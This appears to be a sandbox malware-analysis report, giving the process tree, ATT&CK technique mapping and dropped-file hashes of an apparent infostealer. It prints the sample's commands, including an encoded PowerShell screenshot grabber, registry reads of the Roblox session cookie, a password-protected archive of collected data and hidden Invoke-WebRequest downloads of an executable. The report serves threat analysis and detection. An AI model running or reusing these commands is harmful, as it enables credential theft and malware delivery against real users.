CAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
        5⤵
        
        PID:1680
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
        6⤵
        
        PID:4244
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\e22xgtrb\e22xgtrb.cmdline"
        7⤵
        
        PID:1964
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESE18C.tmp" "c:\Users\Admin\AppData\Local\Temp\e22xgtrb\CSC988812F4E695401DB32BB12322BC3E47.TMP"
        8⤵
        
        PID:4444
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tree /A /F"
        5⤵
        
        PID:5780
      - C:\Windows\system32\tree.com
        
        tree /A /F
        6⤵
        
        PID:5160
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"
        5⤵
        
        PID:5368
      - C:\Windows\system32\attrib.exe
        
        attrib -r C:\Windows\System32\drivers\etc\hosts
        6⤵
        Views/modifies file attributes
        
        PID:756
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tree /A /F"
        5⤵
        
        PID:5532
      - C:\Windows\system32\tree.com
        
        tree /A /F
        6⤵
        
        PID:5424
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"
        5⤵
        
        PID:1056
      - C:\Windows\system32\attrib.exe
        
        attrib +r C:\Windows\System32\drivers\etc\hosts
        6⤵
        Views/modifies file attributes
        
        PID:5460
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tree /A /F"
        5⤵
        
        PID:700
      - C:\Windows\system32\tree.com
        
        tree /A /F
        6⤵
        
        PID:2008
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        5⤵
        
        PID:2032
      - C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        6⤵
        Enumerates processes with tasklist
        
        PID:448
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tree /A /F"
        5⤵
        
        PID:5500
      - C:\Windows\system32\tree.com
        
        tree /A /F
        6⤵
        
        PID:2260
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tree /A /F"
        5⤵
        
        PID:3036
      - C:\Windows\system32\tree.com
        
        tree /A /F
        6⤵
        
        PID:2180
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
        5⤵
        
        PID:4916
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        6⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5088
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
        5⤵
        
        PID:1452
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        6⤵
        
        PID:5484
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "getmac"
        5⤵
        
        PID:3264
      - C:\Windows\system32\getmac.exe
        
        getmac
        6⤵
        
        PID:5532
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI59282\rar.exe a -r -hp"Logger1@12345" "C:\Users\Admin\AppData\Local\Temp\z84wD.zip" *"
        5⤵
        
        PID:3600
      - C:\Users\Admin\AppData\Local\Temp\_MEI59282\rar.exe
        
        C:\Users\Admin\AppData\Local\Temp\_MEI59282\rar.exe a -r -hp"Logger1@12345" "C:\Users\Admin\AppData\Local\Temp\z84wD.zip" *
        6⤵
        
        PID:2008
- - C:\Users\Admin\AppData\Local\Temp\a\in.exe
    "C:\Users\Admin\AppData\Local\Temp\a\in.exe"
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:1496
  - - C:\Windows\system32\cmd.exe
      "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\D279.tmp\D27A.tmp\D27B.bat C:\Users\Admin\AppData\Local\Temp\a\in.exe"
      4⤵
      PID:5476
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe -WindowStyle Hidden -Command "Invoke-WebRequest 'https://github.com/homboz/arht/releases/download/seht/archive.htm/' -outfile archive.htm"
        5⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        
        PID:5908
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe -WindowStyle Hidden -Command "Invoke-WebRequest 'https://github.com/homboz/ucm1/releases/download/iu1/shost.exe/' -outfile shost.exe"
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5184
- - C:\Users\Admin\AppData\Local\Temp\a\NEOFreeSetup.exe
    "C:\Users\Admin\AppData\Local\Temp\a\NEOFreeSetup.exe"
    3⤵
    PID:5368
  - - C:\Windows\SysWOW64\msiexec.exe
      "C:\Windows\System32\msiexec.exe" /I "C:\Program Files (x86)\Common Files\Wise Installation Wizard\WIS0E7C0CA4E536483D943BE977EA796DD9_1_0_0_182.MSI" WISE_SETUP_EXE_PATH="C:\Users\Admin\AppData\Local\Temp\a\NEOFreeSetup.exe"
      4⤵
      PID:1640
- C:\Users\Admin\AppData\Local\Temp\8131.tmp.ssg.exe
  "C:\Users\Admin\AppData\Local\Temp\8131.tmp.ssg.exe"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:5692
- C:\Users\Admin\AppData\Local\Temp\8DF4.tmp.zx.exe
  "C:\Users\Admin\AppData\Local\Temp\8DF4.tmp.zx.exe"
  2⤵
  - Executes dropped EXE
  PID:6008
- - C:\Users\Admin\AppData\Local\Temp\8DF4.tmp.zx.exe
    "C:\Users\Admin\AppData\Local\Temp\8DF4.tmp.zx.exe"
    3⤵
    - Executes dropped EXE
    PID:5852

C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
1⤵
PID:4068

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Modify Registry

T1112

Obfuscated Files or Information

T1027

Command Obfuscation

T1027.010

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Process Discovery

T1057

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

System Network Configuration Discovery

T1016

Wi-Fi Discovery

T1016.002

Lateral Movement

Collection

Clipboard Data

T1115

Data from Local System

T1005

Email Collection

T1114

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\8131.tmp.ssg.exe

Filesize
300KB

MD5
7b6730ca4da283a35c41b831b9567f15

SHA1
92ef2fd33f713d72207209ec65f0de6eef395af5

SHA256
94d7d12ae53ce97f38d8890383c2317ce03d45bd6ecaf0e0b9165c7066cd300c

SHA512
ae2d10f9895e5f2af10b4fa87cdb7c930a531e910b55cd752b15dac77a432cc28eca6e5b32b95eeb21e238aaf2eb57e29474660cae93e734d0b6543c1d462ace

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI16842\VCRUNTIME140.dll

Filesize
87KB

MD5
0e675d4a7a5b7ccd69013386793f68eb

SHA1
6e5821ddd8fea6681bda4448816f39984a33596b

SHA256
bf5ff4603557c9959acec995653d052d9054ad4826df967974efd2f377c723d1

SHA512
cae69a90f92936febde67dacd6ce77647cb3b3ed82bb66463cd9047e90723f633aa2fc365489de09fecdc510be15808c183b12e6236b0893af19633f6a670e66

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI16842\_ctypes.pyd

Filesize
120KB

MD5
f1e33a8f6f91c2ed93dc5049dd50d7b8

SHA1
23c583dc98aa3f6b8b108db5d90e65d3dd72e9b4

SHA256
9459d246df7a3c638776305cf3683946ba8db26a7de90df8b60e1be0b27e53c4

SHA512
229896da389d78cbdf2168753ed7fcc72d8e0e62c6607a3766d6d47842c0abd519ac4f5d46607b15e7ba785280f9d27b482954e931645337a152b8a54467c6a5

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI16842\api-ms-win-core-console-l1-1-0.dll

Filesize
19KB

MD5
b56d69079d2001c1b2af272774b53a64

SHA1
67ede1c5a71412b11847f79f5a684eabaf00de01

SHA256
f3a41d882544202b2e1bdf3d955458be11fc7f76ba12668388a681870636f143

SHA512
7eb8fe111dd2e1f7e308b622461eb311c2b9fc4ef44c76e1def6c524eb7281d5522af12211f1f91f651f2b678592d2997fe4cd15724f700deaff314a1737b3a8

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI16842\api-ms-win-core-datetime-l1-1-0.dll

Filesize
19KB

MD5
5af784f599437629deea9fe4e8eb4799

SHA1
3c891b920fd2703edd6881117ea035ced5a619f6

SHA256
7e5bd3ee263d09c7998e0d5ffa684906ddc56da61536331c89c74b039df00c7c

SHA512
4df58513cf52511c0d2037cdc674115d8ed5a0ed4360eb6383cc6a798a7037f3f7f2d587797223ed7797ccd476f1c503b3c16e095843f43e6b87d55ad4822d70

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI16842\api-ms-win-core-debug-l1-1-0.dll

Filesize
19KB

MD5
e1ca15cf0597c6743b3876af23a96960

SHA1
301231f7250431bd122b12ed34a8d4e8bb379457

SHA256
990e46d8f7c9574a558ebdfcb8739fbccba59d0d3a2193c9c8e66807387a276d

SHA512
7c9dacd882a0650bf2f553e9bc5647e6320a66021ac4c1adc802070fd53de4c6672a7bacfd397c51009a23b6762e85c8017895e9347a94d489d42c50fa0a1c42

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI16842\api-ms-win-core-errorhandling-l1-1-0.dll

Filesize
19KB

MD5
8d6599d7c4897dcd0217070cca074574

SHA1
25eacaaa4c6f89945e97388796a8c85ba6fb01fb

SHA256
a011260fafaaaefd7e7326d8d5290c6a76d55e5af4e43ffa4de5fea9b08fa928

SHA512
e8e2e7c5bff41ccaa0f77c3cfee48dac43c11e75688f03b719cc1d716db047597a7a2ce25b561171ef259957bdcd9dd4345a0e0125db2b36f31698ba178e2248

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI16842\api-ms-win-core-file-l1-1-0.dll

Filesize
22KB

MD5
642b29701907e98e2aa7d36eba7d78b8

SHA1
16f46b0e057816f3592f9c0a6671111ea2f35114

SHA256
5d72feac789562d445d745a55a99536fa9302b0c27b8f493f025ba69ba31941c

SHA512
1beab2b368cc595beb39b2f5a2f52d334bc42bf674b8039d334c6d399c966aff0b15876105f0a4a54fa08e021cb44907ed47d31a0af9e789eb4102b82025cf57

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI16842\api-ms-win-core-file-l1-2-0.dll

Filesize
19KB

MD5
f0c73f7454a5ce6fb8e3d795fdb0235d

SHA1
acdd6c5a359421d268b28ddf19d3bcb71f36c010

SHA256
2a59dd891533a028fae7a81e690e4c28c9074c2f327393fab17329affe53fd7b

SHA512
bd6cf4e37c3e7a1a3b36f42858af1b476f69caa4ba1fd836a7e32220e5eff7ccc811c903019560844af988a7c77cc41dc6216c0c949d8e04516a537da5821a3e

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI16842\api-ms-win-core-file-l2-1-0.dll

Filesize
19KB

MD5
7d4d4593b478b4357446c106b64e61f8

SHA1
8a4969c9e59d7a7485c8cc5723c037b20dea5c9d

SHA256
0a6e2224cde90a0d41926e8863f9956848ffbf19848e8855bd08953112afc801

SHA512
7bc9c473705ec98ba0c1da31c295937d97710cedefc660f6a5cb0512bae36ad23bebb2f6f14df7ce7f90ec3f817b02f577317fdd514560aab22cb0434d8e4e0b

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI16842\api-ms-win-core-handle-l1-1-0.dll

Filesize
19KB

MD5
7bc1b8712e266db746914db48b27ef9c

SHA1
c76eb162c23865b3f1bd7978f7979d6ba09ccb60

SHA256
f82d05aea21bcf6337ef45fbdad6d647d17c043a67b44c7234f149f861a012b9

SHA512
db6983f5f9c18908266dbf01ef95ebae49f88edc04a0515699ef12201ac9a50f09939b8784c75ae513105ada5b155e5330bd42d70f8c8c48fe6005513aefad2a

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI16842\api-ms-win-core-heap-l1-1-0.dll

Filesize
19KB

MD5
b071e761cea670d89d7ae80e016ce7e6

SHA1
c675be753dbef1624100f16674c2221a20cf07dd

SHA256
63fb84a49308b857804ae1481d2d53b00a88bbd806d257d196de2bd5c385701e

SHA512
f2ecbdaba3516d92bd29dcce618185f1755451d95c7dbbe23f8215318f6f300a9964c93ec3ed65c5535d87be82b668e1d3025a7e325af71a05f14e15d530d35f

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI16842\api-ms-win-core-interlocked-l1-1-0.dll

Filesize
19KB

MD5
1dccf27f2967601ce6666c8611317f03

SHA1
d8246df2ed9ec4a8a719fd4b1db4fd8a71ef679b

SHA256
6a83ab9a413afd74d77a090f52784b0128527bee9cb0a4224c59d5c75fc18387

SHA512
70b96d69d609211f8b9e05fa510ea7d574ae8da3a6498f5c982aee71635b8a749162247055b7ba21a884bfa06c1415b68912c463f0f1b6ffb9049f3532386877

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI16842\api-ms-win-core-libraryloader-l1-1-0.dll

Filesize
19KB

MD5
569a7ac3f6824a04282ff708c629a6d2

SHA1
fc0d78de1075dfd4c1024a72074d09576d4d4181

SHA256
84c579a8263a87991ca1d3aee2845e1c262fb4b849606358062093d08afdc7a2

SHA512
e9cbff82e32540f9230cead9063acb1aceb7ccc9f3338c0b7ad10b0ac70ff5b47c15944d0dce33ea8405554aa9b75de30b26ae2ca55db159d45b6e64bc02a180

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI16842\api-ms-win-core-localization-l1-2-0.dll

Filesize
21KB

MD5
1d75e7b9f68c23a195d408cf02248119

SHA1
62179fc9a949d238bb221d7c2f71ba7c1680184c

SHA256
67ebe168b7019627d68064043680674f9782fda7e30258748b29412c2b3d4c6b

SHA512
c2ee84a9aeac34f7b51426d12f87bb35d8c3238bb26a6e14f412ea485e5bd3b8fb5b1231323d4b089cf69d8180a38ddd7fd593cc52cbdf250125ad02d66eea9d

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI16842\api-ms-win-core-memory-l1-1-0.dll

Filesize
19KB

MD5
623283471b12f1bdb83e25dbafaf9c16

SHA1
ecbba66f4dca89a3faa3e242e30aefac8de02153

SHA256
9ca500775fee9ff69b960d65040b8dc415a2efde2982a9251ee6a3e8de625bc7

SHA512
54b69ffa2c263be4ddadca62fa2867fea6148949d64c2634745db3dcbc1ba0ecf7167f02fa53efd69eaaee81d617d914f370f26ca16ee5850853f70c69e9a61f

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI16842\api-ms-win-core-namedpipe-l1-1-0.dll

Filesize
19KB

MD5
61f70f2d1e3f22e976053df5f3d8ecb7

SHA1
7d224b7f404cde960e6b7a1c449b41050c8e9c58

SHA256
2695761b010d22fdfda2b5e73cf0ac7328ccc62b4b28101d5c10155dd9a48020

SHA512
1ddc568590e9954db198f102be99eabb4133b49e9f3b464f2fc7f31cc77d06d5a7132152f4b331332c42f241562ee6c7bf1c2d68e546db3f59ab47eaf83a22cf

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI16842\api-ms-win-core-processenvironment-l1-1-0.dll

Filesize
20KB

MD5
1322690996cf4b2b7275a7950bad9856

SHA1
502e05ed81e3629ea3ed26ee84a4e7c07f663735

SHA256
5660030ee4c18b1610fb9f46e66f44d3fc1cf714ecce235525f08f627b3738d7

SHA512
7edc06bfa9e633351291b449b283659e5dd9e706dd57ade354bce3af55df4842491af27c7721b2acc6948078bdfc8e9736fec46e0641af368d419c7ed6aebd44

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI16842\api-ms-win-core-processthreads-l1-1-0.dll

Filesize
21KB

MD5
95612a8a419c61480b670d6767e72d09

SHA1
3b94d1745aff6aafeff87fed7f23e45473f9afc9

SHA256
6781071119d66757efa996317167904697216ad72d7c031af4337138a61258d4

SHA512
570f15c2c5aa599332dd4cfb3c90da0dd565ca9053ecf1c2c05316a7f623615dd153497e93b38df94971c8abf2e25bc1aaaf3311f1cda432f2670b32c767012a

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI16842\api-ms-win-core-processthreads-l1-1-1.dll

Filesize
19KB

MD5
d6ad0f2652460f428c0e8fc40b6f6115

SHA1
1a5152871abc5cf3d4868a218de665105563775e

SHA256
4ef09fa6510eeebb4855b6f197b20a7a27b56368c63cc8a3d1014fa4231ab93a

SHA512
ceafeee932919bc002b111d6d67b7c249c85d30da35dfbcebd1f37db51e506ac161e4ee047ff8f7bf0d08da6a7f8b97e802224920bd058f8e790e6fa0ee48b22

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI16842\api-ms-win-core-profile-l1-1-0.dll

Filesize
18KB

MD5
654d95515ab099639f2739685cb35977

SHA1
9951854a5cf407051ce6cd44767bfd9bd5c4b0cc

SHA256
c4868e4cebdf86126377a45bd829d88449b4aa031c9b1c05edc47d6d395949d4

SHA512
9c9dd64a3ad1136ba62cca14fc27574faaebc3de1e371a86b83599260424a966dfd813991a5ef0b2342e0401cb99ce83cd82c19fcae73c7decdb92bac1fb58a8

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI16842\api-ms-win-core-rtlsupport-l1-1-0.dll

Filesize
19KB

MD5
e6b7681ccc718ddb69c48abe8709fdd6

SHA1
a518b705746b2c6276f56a2f1c996360b837d548

SHA256
4b532729988224fe5d98056cd94fc3e8b4ba496519f461ef5d9d0ff9d9402d4b

SHA512
89b20affaa23e674543f0f2e9b0a8b3ecd9a8a095e19d50e11c52cb205dafdbf2672892fd35b1c45f16e78ae9b61525de67dbe7673f8ca450aa8c42feeac0895

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI16842\api-ms-win-core-string-l1-1-0.dll

Filesize
19KB

MD5
bcb412464f01467f1066e94085957f42

SHA1
716c11b5d759d59dbfec116874e382d69f9a25b6

SHA256
f040b6e07935b67599ea7e32859a3e93db37ff4195b28b4451ad0d274db6330e

SHA512
79ec0c5ee21680843c8b7f22da3155b7607d5be269f8a51056cc5f060ad3a48ced3b6829117262aba1a90e692374b59ddfe92105d14179f631efc0c863bfdecb

